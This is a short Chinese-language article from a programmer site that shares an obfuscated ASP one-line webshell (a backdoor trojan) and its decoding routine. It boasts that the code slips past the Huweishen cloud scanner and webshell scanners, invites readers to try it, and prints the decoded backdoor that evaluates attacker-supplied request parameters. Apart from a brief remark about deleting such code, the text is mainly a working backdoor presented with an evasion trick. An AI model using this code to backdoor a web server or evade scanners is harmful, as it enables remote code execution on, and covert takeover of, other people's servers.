一句话木马加密 过护卫神云查杀系统 过shell扫描器
程序员文章站
2022-03-19 12:13:26
这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门... 13-01-10...
分享给大家 暂时未测试 大家自己用用看
大马的代码是简单加密了下的!很容易解开看见 是加密的一段代码
复制代码
代码如下:<%
codeds="li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
function decode (coded)
on error resume next
for i = 1 to len (coded)
curchar = mid (coded, i, 1)
if asc (curchar) = 16 then
curchar = chr (8)
elseif asc (curchar) = 24 then
curchar = chr (12)
elseif asc (curchar) = 32 then
curchar = chr (18)
else
curchar = chr (asc (curchar) -3)
end if
decode = decode&curchar
next
end function
response.write(decode(codeds))
%>
很简单的加密,解开一看
复制代码
代码如下:<%
if request("xx") ="x" then eval request("hkmjj") end if
%>
经过测试,发现过目前的护卫神云查杀系统,这个貌似用的人挺多的